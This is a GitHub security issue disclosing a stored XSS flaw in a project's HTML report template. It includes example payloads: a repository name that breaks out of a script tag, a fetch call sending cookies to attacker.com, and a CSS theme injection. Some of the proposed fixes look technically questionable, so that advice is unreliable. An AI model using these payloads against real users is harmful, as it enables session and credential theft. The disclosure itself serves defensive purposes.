Skip to content

SECURITY: Stored XSS in HTML Report via Unsanitized Repository Data #54

@jeremyeder

Description

@jeremyeder

Vulnerability Summary

Severity: HIGH (CVSS 7.1)
CWE: CWE-79 (Cross-Site Scripting - Stored)
Location: src/agentready/templates/report.html.j2:716-717
Impact: Arbitrary JavaScript execution when viewing HTML reports

Description

The HTML report template embeds assessment data as JavaScript without proper sanitization, allowing XSS attacks via malicious repository content.

<!-- VULNERABLE CODE (report.html.j2:716-717) -->
<script>
    // Embedded assessment data (properly escaped to prevent XSS)
    const ASSESSMENT = JSON.parse({{ assessment_json|tojson }});
    
    // Embedded theme data
    const THEMES = JSON.parse({{ available_themes_json|tojson }});
</script>

The comment claims "properly escaped" but uses double JSON encoding which is INSUFFICIENT.

Vulnerability Analysis

While tojson provides some escaping, the attack surface includes:

  1. Repository metadata (name, path, commit messages)
  2. Finding evidence (file contents, error messages)
  3. Remediation content (commands, examples, citations)
  4. User configuration (YAML deserialization)

Attack Vector 1: Malicious Repository Name

# Attacker creates repository with XSS payload
git init "MyRepo</script><img src=x onerror=alert(document.cookie)><script>"
cd "MyRepo</script><img src=x onerror=alert(document.cookie)><script>"

When assessed, the report contains:

const ASSESSMENT = JSON.parse("{\"repository\": {\"name\": \"MyRepo</script>...\"}}")

Attack Vector 2: Malicious Finding Evidence

A crafted assessor returns finding with:

evidence = ['<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>']

This gets embedded in the report and executes when user opens it.

Attack Vector 3: Theme Injection

If custom themes allow user-controlled CSS variables:

custom_theme = {
    "background": "red; } </style><script>alert('XSS')</script><style>"
}

Security Impact

  • Session hijacking: Steal authentication cookies
  • Credential theft: Capture API keys, tokens displayed in report
  • Phishing: Redirect user to malicious site
  • Report tampering: Modify scores, hide vulnerabilities
  • Information disclosure: Exfiltrate assessment data

Remediation

Immediate Fix (P0)

  1. Use Jinja2's autoescaping properly:
{# SECURITY: Enable strict autoescaping for all contexts #}
{% autoescape true %}
<script>
    // SECURITY: Triple-encode JSON to prevent XSS
    // Why: Assessment data contains user-controlled repository content
    // Prevents: Stored XSS (CWE-79)
    const ASSESSMENT = {{ assessment_json|tojson|safe }};
    const THEMES = {{ available_themes_json|tojson|safe }};
</script>
{% endautoescape %}
  1. Sanitize data before template rendering:
# reporters/html.py
import html
import json

def sanitize_for_js(data: dict) -> str:
    """Sanitize data for safe JavaScript embedding."""
    # Convert to JSON
    json_str = json.dumps(data)
    
    # HTML escape to prevent tag injection
    escaped = html.escape(json_str, quote=True)
    
    # Additional escaping for JavaScript context
    escaped = escaped.replace('</', '<\\/')
    escaped = escaped.replace('<!--', '<\\!--')
    
    return escaped

template_data = {
    # ... other fields ...
    "assessment_json": sanitize_for_js(assessment.to_dict()),
    "available_themes_json": sanitize_for_js(available_themes),
}
  1. Add Content Security Policy (already present but verify):
<meta http-equiv="Content-Security-Policy" 
      content="default-src 'none'; 
               script-src 'unsafe-inline'; 
               style-src 'unsafe-inline';
               img-src data:;">

CRITICAL: Remove unsafe-inline for script-src by moving inline scripts to external file or using nonces.

Additional Protections

  1. Input validation on repository metadata:

    # Validate repository name doesn't contain HTML/JS
    SAFE_NAME_PATTERN = re.compile(r'^[a-zA-Z0-9._-]+$')
    if not SAFE_NAME_PATTERN.match(repo.name):
        repo.name = "untrusted-repository"
  2. Sanitize finding evidence:

    def sanitize_evidence(evidence: list[str]) -> list[str]:
        """Strip HTML tags from evidence."""
        import re
        return [re.sub(r'<[^>]+>', '', item) for item in evidence]
  3. Use DOMPurify for JavaScript:

    <script src="https://cdn.jsdelivr.net/npm/dompurify@3.0.0/dist/purify.min.js"></script>
    <script>
        const ASSESSMENT = DOMPurify.sanitize({{ assessment_json|tojson }});
    </script>

References

Related Issues

  • Markdown report may have injection via malicious content
  • YAML deserialization could inject malicious data

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions